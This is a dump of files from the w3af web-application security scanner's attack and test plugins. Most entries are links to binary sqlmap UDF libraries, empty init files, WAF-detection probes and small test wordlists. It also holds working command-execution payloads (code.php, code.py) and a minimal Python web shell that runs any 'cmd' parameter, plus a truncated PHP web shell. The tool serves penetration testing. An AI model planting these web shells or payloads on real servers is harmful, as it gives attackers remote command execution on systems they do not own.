https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/waf/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/waf/proventia.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | __product__ = "Proventia Web Application Security (IBM)"
9 |
10 | def detect(get_page):
11 | page, headers, code = get_page()
12 | if page is None:
13 | return False
14 | page, headers, code = get_page(url="/Admin_Files/")
15 | return page is None
16 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/waf/webappsecure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | __product__ = "webApp.secure (webScurity)"
9 |
10 | def detect(get_page):
11 | page, headers, code = get_page()
12 | if code == 403:
13 | return False
14 | page, headers, code = get_page(get="nx=@@")
15 | return code == 403
16 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/xml/banner/oracle.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/xml/banner/sharepoint.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/xml/banner/x-aspnet-version.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/payloads/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/payloads/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/payloads/code/code.php:
--------------------------------------------------------------------------------
1 | echo strrev("15825b40c6dace2a");
2 | if ( '__CMD_TO_RUN__' !== '' ){
3 | $ar = array(); $ou = "";
4 | exec('__CMD_TO_RUN__', $ar);
5 | foreach ($ar as $k=>$v){$ou = $ou . "$v\n";}
6 | echo base64_encode($ou);
7 | }
8 | echo strrev("7cf5d4ab8ed434d5");
9 |
10 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/payloads/code/code.py:
--------------------------------------------------------------------------------
1 | import sys,commands,base64
2 | sys.stdout.write('15825b40c6dace2a'[::-1])
3 | if '__CMD_TO_RUN__':
4 | sys.stdout.write(base64.b64encode(commands.getoutput('__CMD_TO_RUN__')))
5 | sys.stdout.write('7cf5d4ab8ed434d5'[::-1])
6 | sys.stdout.flush()
--------------------------------------------------------------------------------
/w3af/plugins/attack/payloads/decorators/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/payloads/decorators/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/payloads/misc/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/payloads/misc/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/payloads/misc/file_crawler.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/payloads/misc/file_crawler.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/payloads/payloads/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/payloads/payloads/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/payloads/payloads/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/payloads/payloads/tests/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/payloads/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/payloads/tests/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/payloads/webshell/webshell.php:
--------------------------------------------------------------------------------
1 | $v){$ou = $ou . "$v\n";}
7 | echo base64_encode($ou);
8 | }
9 | echo strrev("7cf5d4ab8ed434d5");
10 | ?>
11 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/payloads/webshell/webshell.py:
--------------------------------------------------------------------------------
1 | import commands
2 |
3 |
4 | def index(req, cmd):
5 | if not cmd:
6 | print "15825b40c6dace2a" + "7cf5d4ab8ed434d5"
7 | else:
8 | return commands.getoutput(cmd)
9 |
--------------------------------------------------------------------------------
/w3af/plugins/auth/__init__.py:
--------------------------------------------------------------------------------
1 |
2 |
3 | def get_long_description():
4 | """
5 | :return: The description for the plugin type.
6 | """
7 | return """Auth plugins make possible to scan authorization protected web applications.
8 | They make login action in the beginning of the scan, logout - in the end
9 | and check current session action regularly."""
10 |
--------------------------------------------------------------------------------
/w3af/plugins/crawl/content_negotiation/common_filenames.db:
--------------------------------------------------------------------------------
1 | admin
2 | backup
3 | back
4 | debug
5 | test
6 | testing
7 |
--------------------------------------------------------------------------------
/w3af/plugins/crawl/ria_enumerator/common_filenames.db:
--------------------------------------------------------------------------------
1 | site-manifest
2 | site_manifest
3 | sitemanifest
4 | gears_manifest
5 | gears-manifest
6 | gearsmanifest
7 | offline-manifest
8 | offline_manifest
9 | offlinemanifest
10 | gears-config
11 | gears_config
12 | gearsconfig
13 | cache-manifest
14 | cache_manifest
15 | cachemanifest
16 | manifest
17 | filesInCache
--------------------------------------------------------------------------------
/w3af/plugins/crawl/user_db/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/crawl/user_db/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/crawl/user_db/os.csv:
--------------------------------------------------------------------------------
1 | Debian based distribution,Debian-exim
2 | Debian based distribution,debian-tor
3 | FreeBSD,kmem
4 |
--------------------------------------------------------------------------------
/w3af/plugins/crawl/wordnet/wordnet.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/crawl/wordnet/wordnet.zip
--------------------------------------------------------------------------------
/w3af/plugins/grep/password_profiling_plugins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/grep/password_profiling_plugins/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/grep/password_profiling_plugins/tests/test.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/grep/password_profiling_plugins/tests/test.pdf
--------------------------------------------------------------------------------
/w3af/plugins/grep/ssndata/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/grep/ssndata/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/grep/user_defined_regex/README.txt:
--------------------------------------------------------------------------------
1 | The default file was taken from the fuzzdb project http://code.google.com/p/fuzzdb/
2 | (errors.txt in folder regex) and w3af's error_pages plugin. It is able to
3 | find more generic strings which leads to more false positives but simplifies
4 | the process of finding customized error messages.
5 |
6 | The fuzzdb file was extended with more strings.
7 |
--------------------------------------------------------------------------------
/w3af/plugins/grep/user_defined_regex/empty.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/grep/user_defined_regex/empty.txt
--------------------------------------------------------------------------------
/w3af/plugins/infrastructure/halberd_helpers/__init__.py:
--------------------------------------------------------------------------------
1 | __author__ = 'pablo'
2 |
--------------------------------------------------------------------------------
/w3af/plugins/infrastructure/oHmap/BUGS:
--------------------------------------------------------------------------------
1 | KNOWN BUGS
2 |
3 | ======================================================================
4 |
5 | - if the default page (e.g. index.html) is missing profiles tend to be
6 | way off
7 |
8 | - some requests return NO_RESPONSE message intermittently
9 | - makes long error range type tests somewhat unreliable for some servers
10 | - don't know if this is a problem with my code or the server or
11 | with the connection
--------------------------------------------------------------------------------
/w3af/plugins/infrastructure/oHmap/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/infrastructure/oHmap/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/output/html_file/templates/high.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/output/html_file/templates/high.png
--------------------------------------------------------------------------------
/w3af/plugins/output/html_file/templates/information.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/output/html_file/templates/information.png
--------------------------------------------------------------------------------
/w3af/plugins/output/html_file/templates/low.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/output/html_file/templates/low.png
--------------------------------------------------------------------------------
/w3af/plugins/output/html_file/templates/medium.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/output/html_file/templates/medium.png
--------------------------------------------------------------------------------
/w3af/plugins/tests/__init__.py:
--------------------------------------------------------------------------------
1 | try:
2 | _('blah')
3 | except:
4 | import __builtin__
5 | __builtin__.__dict__['_'] = lambda x: x
6 |
7 |
8 | def setUpPackage():
9 | import __builtin__
10 | __builtin__.__dict__['_'] = lambda x: x
11 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/attack/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/tests/attack/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/tests/audit/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/tests/audit/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/tests/audit/certs/README:
--------------------------------------------------------------------------------
1 | These certificates are used in the test_ssl_certificate.py unittest and
2 | don't have any real value. They simply trigger different states in the
3 | ssl_certificate.py audit plugin.
4 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/auth/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/tests/auth/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/tests/bruteforce/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/tests/bruteforce/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/tests/bruteforce/small-passwords.txt:
--------------------------------------------------------------------------------
1 | foo
2 | bar
3 | spam
4 | 123
5 | 1234
6 | 12345
7 | 123456
8 | eggs
9 | admin
10 | 000000
11 | 00000
12 | 0000
13 | 000
14 | love
15 |
16 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/bruteforce/small-users-negative.txt:
--------------------------------------------------------------------------------
1 | andres
2 | pablo
3 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/bruteforce/small-users-positive.txt:
--------------------------------------------------------------------------------
1 | pedro
2 | admin
3 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/constants/__init__.py:
--------------------------------------------------------------------------------
1 | __author__ = 'pablo'
2 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/constants/http_responses.py:
--------------------------------------------------------------------------------
1 | APACHE_403_FMT = """
2 |
3 |
4 | 403 Forbidden
5 |
6 | Forbidden
7 | You don't have permission to access %s on this server.
8 |
9 | Apache/2.2.22 (Ubuntu) Server at %s Port 443
10 |
11 | """
12 |
13 |
14 | def get_apache_403(path, domain):
15 | return APACHE_403_FMT % (path, domain)
--------------------------------------------------------------------------------
/w3af/plugins/tests/crawl/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/tests/crawl/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/tests/crawl/dir_file_bruter/test_dirs_small.db:
--------------------------------------------------------------------------------
1 | plugins
2 | tests
3 | crawl
4 | dir_bruter
5 | setup
6 | header
7 | images
8 | portal
9 | index
10 | whoami
11 | andres
12 | riancho
13 | test
14 | foobar
15 | spameggs
16 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/crawl/dir_file_bruter/test_files_small.db:
--------------------------------------------------------------------------------
1 | donotexist.png
2 | donotexist.bmp
3 | donotexist.txt
4 | iamhidden.txt
5 | donotexist.db
6 | donotexist.sqlite3
7 | db.sqlite3
8 | hidden-inside-dir.txt
9 | foobar
10 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/crawl/import_results/input-test.csv:
--------------------------------------------------------------------------------
1 | GET,http://127.0.0.1:8000/,
2 | GET,HtTp://127.0.0.1:8000/audit/,
3 | GET,http://127.0.0.1:8000/audit/?id=1,
4 | POST,http://127.0.0.1:8000/audit/xss/simple_xss_form.py,text=abc
5 |
6 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/crawl/phishtank/__init__.py:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/crawl/web_diff/123.html:
--------------------------------------------------------------------------------
1 | 123
2 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/crawl/web_diff/456.html:
--------------------------------------------------------------------------------
1 | 123
2 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/crawl/web_diff/exclude.php:
--------------------------------------------------------------------------------
1 | 789
2 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/crawl/web_diff/index.html:
--------------------------------------------------------------------------------
1 | abc
2 |
--------------------------------------------------------------------------------
/w3af/plugins/tests/evasion/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/tests/evasion/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/tests/grep/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/tests/grep/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/tests/grep/data/w3af.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/tests/grep/data/w3af.png
--------------------------------------------------------------------------------
/w3af/plugins/tests/infrastructure/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/tests/infrastructure/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/tests/mangle/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/tests/mangle/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/tests/output/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/tests/output/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/tests/output/test_console.py:
--------------------------------------------------------------------------------
1 | """
2 | @see: test_consoleui.py
3 | """
4 |
--------------------------------------------------------------------------------
/w3af/tests/__init__.py:
--------------------------------------------------------------------------------
1 | __author__ = 'pablo'
2 |
--------------------------------------------------------------------------------
/w3af/tests/requirements.txt:
--------------------------------------------------------------------------------
1 | # pylint
2 | pylint==0.28.0
3 | logilab-astng==0.24.3
4 |
5 | # Nose
6 | nose==1.3.4
7 | termcolor==1.1.0
8 | yanc==0.2.4
9 | xunitparser==1.2.0
10 |
11 | # Install requirements for coveralls
12 | coverage==3.6
13 | nose-cov==1.6
14 | coveralls==0.2
15 |
16 | # Other
17 | mock==1.0.1
18 | psutil==2.2.1
19 | SOAPpy==0.12.5
20 | Pillow==1.7.8
21 | SimpleCV==1.3
22 | futures==2.1.5
23 | fabric==1.8.0
24 | yolk==0.4.3
25 | memory_profiler==0.32
--------------------------------------------------------------------------------
/w3af/tests/vuln_sites/__init__.py:
--------------------------------------------------------------------------------
1 | __author__ = 'pablo'
2 |
--------------------------------------------------------------------------------
/w3af/tests/vuln_sites/utils/__init__.py:
--------------------------------------------------------------------------------
1 | __author__ = 'pablo'
2 |
--------------------------------------------------------------------------------